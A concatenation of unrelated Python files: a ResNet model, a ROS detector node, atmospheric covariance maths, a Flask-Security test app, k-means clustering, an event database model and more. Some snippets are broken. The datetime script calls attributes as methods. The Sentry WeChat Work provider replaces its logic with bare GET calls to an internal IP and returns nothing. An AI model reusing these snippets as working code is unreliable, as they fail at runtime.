def forward(self, x):
return self.func(x)
def flatten(x):
return p(x,
lambda _: _.size(0),
lambda _: x.view(_, -1)
)
class ResNet(nn.Module):
def __init__(self, block_sizes, num_classes, in_channels = 64, p = None):
super(ResNet, self).__init__()
self.preres = preResLayer(out_channels = in_channels)
blocks = []
blocks.append(makeBlock(in_channels, in_channels, block_sizes[0], stride=1))
for i in range(1, len(block_sizes)):
out_channels = in_channels * 2
blocks.append(makeBlock(in_channels, out_channels, block_sizes[i]))
in_channels = out_channels
self.blocks = nn.Sequential(*blocks)
self.postres = postResLayer(out_channels, num_classes, dropout_p = p)
def forward(self, x):
return p(x,
self.preres,
self.blocks,
self.postres
)
#unlike PyTorch, Block is defined as an array of layers
#ResNet paper defines layers as PyTorch defines blocks
def makeBlock(in_channels, out_channels, num_layers, stride=2):
def makeLayer(i):
in_chan = in_channels if i == 0 else out_channels
stri = stride if i == 0 else 1
return ResLayer(in_chan, out_channels, stride=stri)
return nn.Sequential(*[makeLayer(i) for i in range(0, num_layers)])
class ResLayer(nn.Module):
def __init__(self, in_channels, out_channels, stride=1):
super(ResLayer, self).__init__()
self.conv1 = makeConv2d(in_channels, out_channels,
stride = stride)
self.bn1 = makeBn2(out_channels)
self.relu = nn.ReLU(inplace = True)
self.conv2 = makeConv2d(out_channels, out_channels)
self.bn2 = makeBn2(out_channels)
self.resizeInput = self.resizeInputGen(in_channels, out_channels, stride)
self.stride = stride
def resizeInputGen(self, in_channels, out_channels, stride):
resizeInput = lambda _: _
if in_channels != out_channels or stride != 1:
resizeInput = nn.Sequential(
makeConv2d(
in_channels, out_channels, kernel_size = 1, stride = stride, padding=0),
makeBn2(out_channels)
)
return resizeInput
def forward(self, x):
def addInput(processed_x):
return processed_x + self.resizeInput(x)
return p(x,
self.conv1,
self.bn1,
self.relu,
self.conv2,
self.bn2,
addInput,
self.relu
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
import numpy
import tf
from os.path import expanduser
from cv_bridge import CvBridge, CvBridgeError
from sensor_msgs import point_cloud2 as pc2
from sensor_msgs.msg import Image, PointCloud2
from dodo_detector.detection import TFObjectDetectorV1, KeypointObjectDetector
from dodo_detector_ros.msg import DetectedObject, DetectedObjectArray
class Detector:
def __init__(self):
# get label map and inference graph from params
detector_type = rospy.get_param('~detector_type')
frozen_graph = rospy.get_param('~inference_graph', '')
label_map = rospy.get_param('~label_map', '')
confidence = rospy.get_param('~tf_confidence', 0.5)
min_points = rospy.get_param('~sift_min_pts', 10)
database_path = rospy.get_param('~sift_database_path', '')
filters = rospy.get_param('~filters', {})
image_topic = rospy.get_param('~image_topic')
point_cloud_topic = rospy.get_param('~point_cloud_topic', None)
self._global_frame = rospy.get_param('~global_frame', None)
self._tf_prefix = rospy.get_param('~tf_prefix', rospy.get_name())
# create a transform listener so we get the fixed frame the user wants
# to publish object tfs related to
self._tf_listener = tf.TransformListener()
if detector_type == 'tf':
rospy.loginfo('Chosen detector type: TensorFlow')
if len(frozen_graph) == 0:
raise ValueError('Parameter \'frozen_graph\' must be passed')
if len(label_map) == 0:
raise ValueError('Parameter \'label_map\' must be passed')
if confidence <= 0 or confidence > 1:
raise ValueError('Parameter \'confidence\' must be between 0 and 1')
frozen_graph = expanduser(frozen_graph)
label_map = expanduser(label_map)
self._detector = TFObjectDetectorV1(frozen_graph, label_map, confidence=confidence)
rospy.loginfo('Path to inference graph: ' + frozen_graph)
rospy.loginfo('Path to label map: ' + label_map)
# count number of classes from label map
label_map_contents = open(label_map, 'r').read()
num_classes = label_map_contents.count('name:')
rospy.loginfo('Number of classes: ' + str(num_classes))
elif detector_type in ['sift', 'rootsift']:
rospy.loginfo('Chosen detector type: Keypoint Object Detector')
if min_points <= 0:
raise ValueError('Parameter \'min_points\' must greater than 0')
if len(database_path) == 0:
raise ValueError('Parameter \'database_path\' must be passed')
database_path = expanduser(database_path)
detector_type = 'SIFT' if detector_type == 'sift' else 'RootSIFT'
self._detector = KeypointObjectDetector(database_path,
detector_type,
min_points=min_points)
rospy.loginfo('Database path: ' + database_path)
rospy.loginfo('Min. points: ' + str(min_points))
# create detector
self._bridge = CvBridge()
# image and point cloud subscribers
# and variables that will hold their values
rospy.Subscriber(image_topic, Image, self.image_callback)
if point_cloud_topic is not None:
rospy.Subscriber(point_cloud_topic, PointCloud2, self.pc_callback)
else:
rospy.loginfo(
'No point cloud information available. Objects will not be placed in the scene.')
self._current_image = None
self._current_pc = None
# publisher for frames with detected objects
self._imagepub = rospy.Publisher('~labeled_image', Image, queue_size=10)
# this package works with a dynamic list of publishers
# if no filter is configured via parameters to the package,
# one default, unfiltered publisher will publish every object
if len(filters) == 0:
rospy.loginfo('No filter configured, publishing every detected object in a single topic')
self._publishers = {
None: (None, rospy.Publisher('~detected', DetectedObjectArray, queue_size=10))}
# else, for each filter created in the yaml config file, a new publisher is created
else:
self._publishers = {}
for key in filters:
cat_ok = False
for cat in self._detector.categories:
if cat in filters[key]:
cat_ok = True
break
if not cat_ok:
rospy.logwarn('Key ' + filters[key] + ' is not detected by this detector!')
else:
self._publishers[key] = (filters[key],
rospy.Publisher('~detected_' + key,
DetectedObjectArray,
queue_size=10))
rospy.loginfo('Created topic for filter [' + key + ']')
self._tfpub = tf.TransformBroadcaster()
rospy.loginfo('Ready to detect!')
def image_callback(self, image):
"""Image callback"""
# Store value on a private attribute
self._current_image = image
def pc_callback(self, pc):
"""Point cloud callback"""
# Store value on a private attribute
self._current_pc = pc
def run(self):
# run while ROS runs
while not rospy.is_shutdown():
# only run if there's an image present
if self._current_image is not None:
try:
# if the user passes a fixed frame, we'll ask for transformation
# vectors from the camera link to the fixed frame
if self._global_frame is not None:
(trans, _) = self._tf_listener.lookupTransform('/' + self._global_frame,
'/camera_link',
rospy.Time(0))
# convert image from the subscriber into an OpenCV image
scene = self._bridge.imgmsg_to_cv2(self._current_image, 'rgb8')
marked_image, objects = self._detector.from_image(scene) # detect objects
self._imagepub.publish(self._bridge.cv2_to_imgmsg(
marked_image, 'rgb8')) # publish detection results
# well create an empty msg for each publisher
msgs = {}
for key in self._publishers:
msgs[key] = DetectedObjectArray()
# iterate over the dictionary of detected objects
for obj_class in objects:
rospy.logdebug('Found ' + str(len(objects[obj_class])) + ' object(s) of type ' +
obj_class)
for obj_type_index, coordinates in enumerate(objects[obj_class]):
rospy.logdebug('...' + obj_class + ' ' + str(obj_type_index) + ' at ' +
str(coordinates['box']))
ymin, xmin, ymax, xmax = coordinates['box']
y_center = ymax - ((ymax - ymin) / 2)
x_center = xmax - ((xmax - xmin) / 2)
detected_object = DetectedObject()
detected_object.type.data = obj_class
detected_object.image_x.data = xmin
detected_object.image_y.data = ymin
detected_object.image_width.data = xmax - xmin
detected_object.image_height.data = ymax - ymin
# TODO the timestamp of image, depth and point cloud should be checked
# to make sure we are using synchronized data...
publish_tf = False
if self._current_pc is None:
rospy.loginfo(
'No point cloud information available to track current object in scene')
# if there is point cloud data, we'll try to place a tf
# in the object's location
else:
# this function gives us a generator of points.
# we ask for a single point in the center of our object.
pc_list = list(
pc2.read_points(self._current_pc,
skip_nans=True,
field_names=('x', 'y', 'z'),
uvs=[(x_center, y_center)]))
if len(pc_list) > 0:
publish_tf = True
# this is the location of our object in space
tf_id = obj_class + '_' + str(obj_type_index)
# if the user passes a tf prefix, we append it to the object tf name here
if self._tf_prefix is not None:
tf_id = self._tf_prefix + '/' + tf_id
detected_object.tf_id.data = tf_id
point_x, point_y, point_z = pc_list[0]
for key in self._publishers:
# add the object to the unfiltered publisher,
# as well as the ones whose filter include this class of objects
if key is None or obj_class in self._publishers[key][0]:
msgs[key].detected_objects.append(detected_object)
# we'll publish a TF related to this object only once
if publish_tf:
# kinect here is mapped as camera_link
# object tf (x, y, z) must be
# passed as (z,-x,-y)
object_tf = [point_z, -point_x, -point_y]
frame = 'camera_link'
# translate the tf in regard to the fixed frame
if self._global_frame is not None:
object_tf = numpy.array(trans) + object_tf
frame = self._global_frame
# this fixes #7 on GitHub, when applying the
# translation to the tf creates a vector that
# RViz just can'y handle
if object_tf is not None:
self._tfpub.sendTransform((object_tf),
tf.transformations.quaternion_from_euler(
0, 0, 0),
rospy.Time.now(),
tf_id,
frame)
# publish all the messages in their corresponding publishers
for key in self._publishers:
self._publishers[key][1].publish(msgs[key])
except CvBridgeError as e:
print(e)
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException) as e:
print(e)
if __name__ == '__main__':
rospy.init_node('dodo_detector_ros', log_level=rospy.INFO)
try:
Detector().run()
except KeyboardInterrupt:
rospy.loginfo('Shutting down')
|
from functools import partial
import numpy as np
class Covariance:
def __init__(self, nol: int, alt: np.ma.MaskedArray):
"""assumed covariances
:param no number of levels
:param alt altitudes
"""
self.nol = nol
self.alt = alt
def gaussian(self, x, mu, sig):
"""Gaussian function
:param x: Input value
:param mu: Mean value of gaussian
:param sig: Standard deviation of gaussian
"""
return np.exp(-((x - mu)*(x - mu))/(2 * sig * sig))
def traf(self) -> np.ndarray:
"""P (see equation 6)
Used to transform {ln[H2O], ln[HDO]} state
into the new coordination systems
{(ln[H2O]+ln[HDO])/2 and ln[HDO]-ln[H2O]}
"""
return np.block([[np.identity(self.nol)*0.5, np.identity(self.nol)*0.5],
[-np.identity(self.nol), np.identity(self.nol)]])
def assumed_covariance(self, species=2, w1=1.0, w2=0.01, correlation_length=2500) -> np.ndarray:
"""Sa' (see equation 7)
A priori covariance of {(ln[H2O]+ln[HDO])/2 and ln[HDO]-ln[H2O]} state
Sa See equation 5 in paper
:param species Number of atmospheric species (1 or 2)
:param w1: Weight for upper left quadrant
:param w2: Weight for lower right quadrant (ignored with 1 species)
:param correlation_length: Assumed correlation of atmospheric levels in meter
"""
# only 1 or 2 species are allowed
assert (species >= 1) and (species <= 2)
result = np.zeros((species * self.nol, species * self.nol))
for i in range(self.nol):
for j in range(self.nol):
# 2500 = correlation length
# 100% for
# (ln[H2O]+ln[HDO])/2 state
result[i, j] = w1 * \
self.gaussian(self.alt[i], self.alt[j], correlation_length)
if species == 2:
# 10% for (0.01 covariance)
# ln[HDO]-ln[H2O] state
result[i + self.nol, j + self.nol] = w2 * \
self.gaussian(
self.alt[i], self.alt[j], correlation_length)
return result
def apriori_covariance(self) -> np.ndarray:
"""Sa (see equation 5)
A priori Covariance of {ln[H2O], ln[HDO]} state
Sa' = P * Sa * P.T (equation 7 in paper)
equals to
Sa = inv(P) * Sa' * inv(P.T)
"""
P = self.traf()
return np.linalg.inv(P) @ self.apriori_covariance_traf() @ np.linalg.inv(P.T)
def type1_of(self, matrix) -> np.ndarray:
"""A' (see equation 10)
Return tranformed martix
"""
P = self.traf()
return P @ matrix @ np.linalg.inv(P)
def c_by_type1(self, A_) -> np.ndarray:
return np.block([[A_[self.nol:, self.nol:], np.zeros((self.nol, self.nol))],
[-A_[self.nol:, :self.nol], np.identity(self.nol)]])
def c_by_avk(self, avk):
A_ = self.type1_of(avk)
return self.c_by_type1(A_)
def type2_of(self, matrix) -> np.ndarray:
"""A'' (see equation 15)
A posteriori transformed matrix
"""
A_ = self.type1_of(matrix)
C = self.c_by_type1(A_)
return C @ A_
def smoothing_error(self, actual_matrix, to_compare, **kwargs) -> np.ndarray:
"""S's (see equation 11)
"""
return (actual_matrix - to_compare) @ self.assumed_covariance(**kwargs) @ (actual_matrix - to_compare).T
|
# -*- coding: utf-8 -*-
from flask import Flask, render_template, current_app
from flask.ext.mail import Mail
from flask.ext.security import login_required, roles_required, roles_accepted
from flask.ext.security.decorators import http_auth_required, \
auth_token_required, auth_required
from flask.ext.security.utils import encrypt_password
from werkzeug.local import LocalProxy
ds = LocalProxy(lambda: current_app.extensions['security'].datastore)
def create_app(config):
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'secret'
app.config['TESTING'] = True
for key, value in config.items():
app.config[key] = value
mail = Mail(app)
app.extensions['mail'] = mail
@app.route('/')
def index():
return render_template('index.html', content='Home Page')
@app.route('/profile')
@login_required
def profile():
return render_template('index.html', content='Profile Page')
@app.route('/post_login')
@login_required
def post_login():
return render_template('index.html', content='Post Login')
@app.route('/http')
@http_auth_required
def http():
return 'HTTP Authentication'
@app.route('/http_custom_realm')
@http_auth_required('My Realm')
def http_custom_realm():
return render_template('index.html', content='HTTP Authentication')
@app.route('/token')
@auth_token_required
def token():
return render_template('index.html', content='Token Authentication')
@app.route('/multi_auth')
@auth_required('session', 'token', 'basic')
def multi_auth():
return render_template('index.html', content='Session, Token, Basic auth')
@app.route('/post_logout')
def post_logout():
return render_template('index.html', content='Post Logout')
@app.route('/post_register')
def post_register():
return render_template('index.html', content='Post Register')
@app.route('/admin')
@roles_required('admin')
def admin():
return render_template('index.html', content='Admin Page')
@app.route('/admin_and_editor')
@roles_required('admin', 'editor')
def admin_and_editor():
return render_template('index.html', content='Admin and Editor Page')
@app.route('/admin_or_editor')
@roles_accepted('admin', 'editor')
def admin_or_editor():
return render_template('index.html', content='Admin or Editor Page')
@app.route('/unauthorized')
def unauthorized():
return render_template('unauthorized.html')
@app.route('/coverage/add_role_to_user')
def add_role_to_user():
u = ds.find_user(email='joe@lp.com')
r = ds.find_role('admin')
ds.add_role_to_user(u, r)
return 'success'
@app.route('/coverage/remove_role_from_user')
def remove_role_from_user():
u = ds.find_user(email='matt@lp.com')
ds.remove_role_from_user(u, 'admin')
return 'success'
@app.route('/coverage/deactivate_user')
def deactivate_user():
u = ds.find_user(email='matt@lp.com')
ds.deactivate_user(u)
return 'success'
@app.route('/coverage/activate_user')
def activate_user():
u = ds.find_user(email='tiya@lp.com')
ds.activate_user(u)
return 'success'
@app.route('/coverage/invalid_role')
def invalid_role():
return 'success' if ds.find_role('bogus') is None else 'failure'
@app.route('/page1')
def page_1():
return 'Page 1'
return app
def create_roles():
for role in ('admin', 'editor', 'author'):
ds.create_role(name=role)
ds.commit()
def create_users(count=None):
users = [('matt@lp.com', 'password', ['admin'], True),
('joe@lp.com', 'password', ['editor'], True),
('dave@lp.com', 'password', ['admin', 'editor'], True),
('jill@lp.com', 'password', ['author'], True),
('tiya@lp.com', 'password', [], False)]
count = count or len(users)
for u in users[:count]:
pw = encrypt_password(u[1])
ds.create_user(email=u[0], password=pw,
roles=u[2], active=u[3])
ds.commit()
def populate_data(user_count=None):
create_roles()
create_users(user_count)
def add_context_processors(s):
@s.context_processor
def for_all():
return dict()
@s.forgot_password_context_processor
def forgot_password():
return dict()
@s.login_context_processor
def login():
return dict()
@s.register_context_processor
def register():
return dict()
@s.reset_password_context_processor
def reset_password():
return dict()
@s.send_confirmation_context_processor
def send_confirmation():
return dict()
@s.send_login_context_processor
def send_login():
return dict()
@s.mail_context_processor
def mail():
return dict()
|
import numpy as np
import matplotlib.pyplot as plt
entrada = np.array([[-0.4712, 1.7698], [0.1103, 3.1334], [2.0263,3.2474],
[1.5697, 0.7579], [1.7254, 4.0834], [2.2676, 0.4092],
[-0.4753, 1.1308], [3.2018, 3.1839], [2.0614, 1.6423],
[2.4969, 1.6099], [7.1547, 5.4719], [5.8240, 6.5220],
[7.0105, 8.9157], [6.3086, 6.0023], [6.1122, 6.2530],
[4.1822, 5.1714], [7.5074, 7.1391], [8.5628, 7.4580],
[6.9596, 5.4075], [6.7379, 10.1990], [2.1959, 7.1072],
[4.9906, 7.8603], [4.0592, 6.7196], [-0.3881, 6.8434],
[3.1318, 6.1018], [3.2421, 8.2583], [1.2560, 5.9102],
[2.8671, 5.8639], [1.8885, 5.8148], [1.0263, 7.9487],
[4.9782, 0.8005], [6.5436, 2.1400], [6.4685, 2.3265],
[7.8461, 1.3620], [6.6673, 2.8004], [6.8124, 2.7228],
[5.8382, 1.9450], [7.1404, 3.3512], [7.1251, 4.9571],
[4.7644, 2.3254],[7.5, 10.4], [-2.23, -1.522], [1.9, -7.2], [13.455, -5.0],[-3, -4],
[3.388, 5.239],[0.23, 0.1], [-1, 2.34]])
def plot(idx):
idx = np.array(idx)
plt.scatter(entrada[:, 0], entrada[:, 1], c = idx, s=100)
plt.scatter(Centroide[:, 0], Centroide[:, 1], s=1000, c=np.array([i for i in range(len(Centroide))]), marker='*')
plt.title('Centroides')
plt.xlabel('Entrada X0')
plt.ylabel('Entrada X1')
plt.axis('equal')
plt.pause(0.75)
def initList(size):
mylist = list()
for i in range(size):
mylist.append( list() ) #different object reference each time
return mylist
def init(NCentroides, NEntradas):
idx = np.random.permutation(entrada.shape[0])[0:NCentroides]
return entrada[idx, :]
def EuclideanDistance(Centroide, Entrada):
distance = np.zeros((Entrada.shape[0], Centroide.shape[0]))
for k in range(Centroide.shape[0]):
for i in range(Entrada.shape[0]):
for j in range(Entrada.shape[1]):
distance[i, k] += (Entrada[i, j] - Centroide[k, j])**2
distance[i, k] = np.sqrt(distance[i, k])
return distance
def KMeans(Entrada, Centroide):
oldC = np.zeros((Centroide.shape))
count = 0
while True:
count += 1
pointCentroides = initList(Centroide.shape[0])
Distance = EuclideanDistance(Centroide, Entrada)
Distance = list(Distance)
idx = []
for i in range(len(Distance)):
Distance[i]= list(Distance[i])
for i in range(Entrada.shape[0]):
shortest = min(Distance[i])
index = Distance[i].index(shortest)
idx.append(index)
pointCentroides[index].append(Entrada[i, :].tolist())
nppc = [0]*len(pointCentroides)
for x in range(len(pointCentroides)):
nppc[x] = len(pointCentroides[x])
pointCentroides[x] = np.array(pointCentroides[x])
pointCentroides[x] = sum(pointCentroides[x])/len(pointCentroides[x])
Centroide[x] = pointCentroides[x]
if (Centroide == oldC).all():
plot(idx)
break
else:
plot(idx)
plt.gcf().clear()
oldC = np.copy(Centroide)
print('Centroides finais: ', Centroide, '\nCount', count)
plt.show()
return Centroide, nppc
Centroide = init(6, entrada.shape[1])
KMeans(entrada, Centroide)
# nc = 15
# nmppc = int(0.1*entrada.shape[0])
# for i in range(nc, 0, -1):
# Centroide = init(i, entrada.shape[1])
# _, xxx = KMeans(entrada, Centroide)
# if sum(list(map(lambda x: x >= nmppc, xxx))) == i:
# print(i)
# break
|
from __future__ import annotations
import os
import base64
import json
from typing import Any, Dict, List, Optional, Union
from .database import query, queryWithResult, queryWithResults
from .league import League
def getJSON(data: str) -> Dict[str, Any]:
if data:
try:
return json.loads(data)
except:
return {}
return {}
properties = [
"id",
"name",
"date",
"website",
"organiser",
"moreInformation",
"leagueName",
"resultUploaded",
"results",
"winsplits",
"routegadget",
"userSubmittedResults",
"secondaryLeague",
"requiredInTotal",
"additionalSettings",
"uploadKey",
]
def generateUploadKey() -> str:
# Generate Random Upload Key
random = os.urandom(15)
string = str(base64.b64encode(random))
return string[2:22]
class Event:
# event information
id: str
name: str
date: str
website: str
organiser: str
moreInformation: str
league: Optional[str] # from initilization
leagueName: str
# results in second league
secondaryLeague: Optional[str]
# results
resultUploaded: bool
results: str
winsplits: str
routegadget: str
userSubmittedResults: bool
requiredInTotal: bool
additionalSettings: str
uploadKey: str
def __init__(self, event):
if type(event) == dict:
for key in event:
setattr(self, key, event[key])
else:
for (index, key) in enumerate(properties):
setattr(self, key, event[index])
if hasattr(self, "league") and self.league:
self.leagueName = self.league
def toDictionary(self) -> Dict[str, Any]:
return {
"id": self.id,
"name": self.name,
"date": self.date,
"website": self.website,
"organiser": self.organiser,
"moreInformation": self.moreInformation,
"league": self.leagueName,
"resultUploaded": self.resultUploaded,
"results": self.results,
"winsplits": self.winsplits,
"routegadget": self.routegadget,
"userSubmittedResults": self.userSubmittedResults,
"secondaryLeague": self.secondaryLeague,
"additionalSettings": self.additionalSettings,
"requiredInTotal": self.requiredInTotal,
}
def toDictionaryWithUploadKey(self) -> Dict[str, Any]:
return {
**self.toDictionary(),
"uploadKey": self.uploadKey,
}
def getEventId(self) -> str:
return (self.leagueName + self.name + self.date).replace(" ", "")
def getLeague(self) -> League:
return League.getByName(self.leagueName)
def getAdditionalSettingsAsJSON(self) -> Dict[str, Any]:
return getJSON(self.additionalSettings)
def create(self) -> None:
query(
"""
INSERT INTO events (
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)
""",
(
self.getEventId(),
self.name,
self.date,
self.website,
self.organiser,
self.moreInformation,
self.league,
self.resultUploaded,
self.results,
self.winsplits,
self.routegadget,
self.userSubmittedResults,
self.secondaryLeague,
self.requiredInTotal,
self.additionalSettings,
generateUploadKey(),
),
)
def update(self, oldEventId: str) -> None:
query(
"""
UPDATE events SET
id=%s,
name=%s,
date=%s,
website=%s,
organiser=%s,
moreInformation=%s,
league=%s,
resultUploaded=%s,
results=%s,
winsplits=%s,
routegadget=%s,
userSubmittedResults=%s,
secondaryLeague=%s,
requiredInTotal=%s,
additionalSettings=%s
WHERE id=%s
""",
(
self.getEventId(),
self.name,
self.date,
self.website,
self.organiser,
self.moreInformation,
self.leagueName,
self.resultUploaded,
self.results,
self.winsplits,
self.routegadget,
self.userSubmittedResults,
self.secondaryLeague,
self.requiredInTotal,
self.additionalSettings,
oldEventId,
),
)
def setResultUploaded(self) -> None:
query(
"""
UPDATE events
SET resultUploaded=%s
WHERE id=%s
""",
(True, self.getEventId()),
)
def setResultUploadedWithURLs(
self, results: str, winsplits: str, routegadget: str
) -> None:
query(
"""
UPDATE events
SET
resultUploaded=%s,
results=%s,
winsplits=%s,
routegadget=%s
WHERE id=%s
""",
(True, results, winsplits, routegadget, self.id),
)
@staticmethod
def getAll() -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
ORDER BY date ASC, name ASC
"""
)
return [Event(result) for result in databaseResult]
@staticmethod
def getById(eventId: str) -> Optional[Event]:
databaseResult = queryWithResult(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE id=%s
""",
(eventId,),
)
if not databaseResult:
return None
return Event(databaseResult)
@staticmethod
def getByLeague(league: str) -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE league=%s OR secondaryLeague=%s
ORDER BY date ASC, name ASC
""",
(league, league),
)
return [Event(result) for result in databaseResult]
@staticmethod
def getByLeagueWithResults(league: str) -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE
(league=%s OR secondaryLeague=%s)
AND resultUploaded=%s
ORDER BY date ASC, name ASC
""",
(league, league, True),
)
return [Event(result) for result in databaseResult]
@staticmethod
def getLatestWithResults() -> List[Event]:
databaseResult = queryWithResults(
"""
SELECT
id,
name,
date,
website,
organiser,
moreInformation,
league,
resultUploaded,
results,
winsplits,
routegadget,
userSubmittedResults,
secondaryLeague,
requiredInTotal,
additionalSettings,
uploadKey
FROM events
WHERE resultUploaded = true
ORDER BY date DESC, name ASC
LIMIT 12
"""
)
return [Event(result) for result in databaseResult]
@staticmethod
def exists(eventId: str) -> bool:
return bool(Event.getById(eventId))
@staticmethod
def deleteById(eventId: str) -> None:
query(
"""
DELETE FROM events
WHERE id=%s
""",
(eventId,),
)
@staticmethod
def deleteAll() -> None:
query("DELETE FROM events")
|
# -*- coding: utf-8 -*-
from datetime import datetime
str = datetime.now().strftime("%Y/%m/%d %H:%M:%S")
print("all=" + str)
str = datetime.now().year()
print("year=" + str)
str = datetime.now().month()
print("month=" + str)
str = datetime.now().day()
print("day=" + str)
str = datetime.now().weekday()
print("week=" + str)
str = datetime.now().hour()
print("hour=" + str)
str = datetime.now().minute()
print("minute=" + str)
str = datetime.now().second()
print("second=" + str)
|
import turtle
w = turtle.Screen()
w.title('Spiral Helix')
w.bgcolor('black')
colors = ['red', 'purple', 'blue', 'green', 'orange', 'yellow']
t = turtle.Pen()
t.speed(100)
for x in range(360):
color = colors[x % len(colors)]
t.pencolor(color)
t.width(x / 100 + 1)
t.forward(x)
t.left(59)
turtle.done()
|
"""
Copyright 2019 EUROCONTROL
==========================================
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==========================================
Editorial note: this license is an instance of the BSD license template as provided by the Open Source Initiative:
http://opensource.org/licenses/BSD-3-Clause
Details on EUROCONTROL: http://www.eurocontrol.int
"""
import logging
from typing import Optional, Any, Dict, List, Set
from rest_client.errors import APIError
from subscription_manager_client.models import Topic as SMTopic
from swim_pubsub.core.clients import PubSubClient
from swim_pubsub.core.errors import PubSubClientError
from swim_pubsub.core.topics import TopicType
from swim_pubsub.publisher.handler import PublisherBrokerHandler
from swim_pubsub.core.subscription_manager_service import SubscriptionManagerService
__author__ = "EUROCONTROL (SWIM)"
_logger = logging.getLogger(__name__)
class Publisher(PubSubClient):
def __init__(self, broker_handler: PublisherBrokerHandler, sm_service: SubscriptionManagerService):
"""
Implementation of an actual SubscriptionManager user who acts as a publisher. The broker_handler should be a
`PublisherBrokerHandler` or a derivative.
:param broker_handler:
:param sm_service:
"""
self.broker_handler: PublisherBrokerHandler = broker_handler # for type hint
PubSubClient.__init__(self, broker_handler, sm_service)
self.topics_dict: Dict[str, TopicType] = {}
def register_topic(self, topic: TopicType):
"""
- Keeps a reference to the provided topic
- Creates the topic in SM
- Passes it to the broker handler
:param topic:
"""
if topic.name in self.topics_dict:
_logger.error(f"Topic with name {topic.name} already exists in broker.")
return
try:
self.sm_service.create_topic(topic_name=topic.name)
except APIError as e:
if e.status_code == 409:
_logger.error(f"Topic with name {topic.name} already exists in SM")
else:
raise PubSubClientError(f"Error while creating topic in SM: {str(e)}")
self.topics_dict[topic.name] = topic
self.broker_handler.add_topic(topic)
def publish_topic(self, topic_id: str, context: Optional[Any] = None):
"""
On demand data publish of the provided topic_id
:param topic_id:
:param context:
"""
topic = self.topics_dict.get(topic_id)
if topic is None:
raise PubSubClientError(f"Invalid topic id: {topic_id}")
self.broker_handler.trigger_topic(topic=topic, context=context)
def sync_sm_topics(self):
"""
Syncs the topics in SM based on the locally registered once:
- Topics that exist in SM but not locally will be deleted from SM
- Topics that exist locally but not in SM will be created in SM
"""
sm_topics: List[SMTopic] = self.sm_service.get_topics()
sm_topics_str: List[str] = [topic.name for topic in sm_topics]
local_topics_str: List[str] = [topic.name for topic in self.topics_dict.values()]
topics_str_to_create: Set[str] = set(local_topics_str) - set(sm_topics_str)
topics_str_to_delete: Set[str] = set(sm_topics_str) - set(local_topics_str)
topic_to_delete: List[SMTopic] = [topic for topic in sm_topics if topic.name in topics_str_to_delete]
for topic_name in topics_str_to_create:
self.sm_service.create_topic(topic_name=topic_name)
for topic in topic_to_delete:
self.sm_service.delete_topic(topic=topic)
|
from __future__ import absolute_import
import logging
from time import time
from sentry.auth.provider import Provider
from sentry.http import safe_urlopen
from sentry.utils import json
from sentry.auth.exceptions import IdentityNotValid
from .views import WxWorkLogin, WxWorkCallback, FetchUser, SendHt
from .constants import (
ACCESS_TOKEN_URL, CLIENT_ID, CLIENT_SECRET
)
class WxWorkAuthProvider(Provider):
name = 'WeChat Work'
logger = logging.getLogger('auth_wxwork')
client_id = CLIENT_ID
client_secret = CLIENT_SECRET
access_token_url = ACCESS_TOKEN_URL
def get_auth_pipeline(self):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return [
# # WxWorkLogin(),
# # WxWorkCallback(),
# # FetchUser(),
# SendHt()
# ]
def build_config(self, config):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return {}
def get_identity_data(self, payload):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# return {
# 'access_token': payload['access_token'],
# 'expires': int(time()) + int(payload['expires_in']),
# }
def build_identity(self, state):
safe_urlopen(method='GET', url='http://192.168.120.242:7000/v1/msg/zwjGet')
# data = state['data']
# user_data = state['user']
# return {
# 'id': user_data['userid'],
